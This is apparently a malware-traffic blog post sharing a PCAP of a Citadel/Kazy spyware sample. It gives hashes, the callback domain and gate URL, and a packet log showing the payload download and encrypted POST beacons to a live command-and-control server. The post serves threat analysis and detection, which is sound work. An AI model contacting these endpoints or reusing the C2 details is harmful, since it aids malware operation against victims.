Citadel/Kazy Malware Sample Loaded from us.exe qawsf1gy.bget.ru file.php PCAP file download

Download Attachments

  • 1 pcap us
    Date added: September 24, 2016 4:34 am Added by: admin File size: 301 KB Downloads: 70

https://www.virustotal.com/cs/file/00f9c0fd7b6ab235bf07a4f1e235940e3e40938c5932a7283568f36d76df673b/analysis/

https://www.virustotal.com/cs/domain/qawsf1gy.bget.ru/information/

http://cybercrime-tracker.net/ccamdetail.php?hash=8a76acba63abcdb9cfc0a71e8c1358c74e8db83b

 

SPYWARE.CITADEL.ATMOS

Sample: 8a76acba63abcdb9cfc0a71e8c1358c74e8db83b
SHA256: 7331a96dbd2bec70027e259f1cbdaf5c7733b318da39812b22111f85ae730860
Request: Tayuya [2016/09/20 – 23:09:39]
Callback: qawsf1gy.bget.ru
Gate: http://qawsf1gy.bget.ru/file.php|file=us.xml

2016-09-20 10:29:07.228008 IP 192.168.1.102.59912 > 192.168.1.100.80: Flags [P.], seq 1:333, ack 1, win 256, length 332: HTTP: GET /captured/us.exe HTTP/1.1
E..t.d………f…d…P..9..G..P…N<..GET /captured/us.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://192.168.1.100/captured/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100
Connection: Keep-Alive
2016-09-20 10:29:07.228032 IP 192.168.1.100.80 > 192.168.1.102.59912: Flags [.], ack 333, win 237, length 0
E..(f.@.@.P&…d…f.P…G….;.P….5..
2016-09-20 10:29:07.228202 IP 192.168.1.100.80 > 192.168.1.102.59912: Flags [.], seq 1:2921, ack 333, win 237, length 2920: HTTP: HTTP/1.1 200 OK
E…f.@.@.D….d…f.P…G….;.P…….HTTP/1.1 200 OK
Date: Tue, 20 Sep 2016 14:29:07 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Tue, 20 Sep 2016 09:31:34 GMT
ETag: “42000-53ced182f7dde”
Accept-Ranges: bytes
Content-Length: 270336
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
2016-09-20 10:33:23.877361 IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq 353:706, ack 519, win 63722, length 353: HTTP: POST /file.php HTTP/1.1
E…lZ………fW..:…Pfd……P…6
..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.^.W.v}.U.io(..>..~u..L…..].]eb<………+.X..P{. ..j.q1.P….,I..0.
..6.j)………..E.D..os.”.V..*w.2~9|O…..8..1…vm.d…V..?…..c1R’.
2016-09-20 10:33:24.018449 IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq 706:1059, ack 1037, win 63204, length 353: HTTP: POST /file.php HTTP/1.1
E…l[………fW..:…Pfd. ….P….u..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.. #Yx.// .F.M..i..k;t…..H….).OiH….1K….-..;..:E…*Dg……qq…..&C.Ib.h.?.Uz..~.b…..i..c..(..Nu…7.)@-B…fj……..k.K..;….{.4
2016-09-20 10:33:24.157065 IP 192.168.1.102.59918 > 87.236.19.58.80: Flags [P.], seq 1059:1412, ack 1555, win 64240, length 353: HTTP: POST /file.php HTTP/1.1
E…l\………fW..:…Pfd.j….P…….POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.. #Yx.// .F.M..i..k;t…..H….).OiH….1K….-..;..:E…*Dg……qq…..&C.Ib.h.?.Uz..~.b…..i..c..(..Nu…7.)@-B…fj……..k.K..;….{.4

Leave a Reply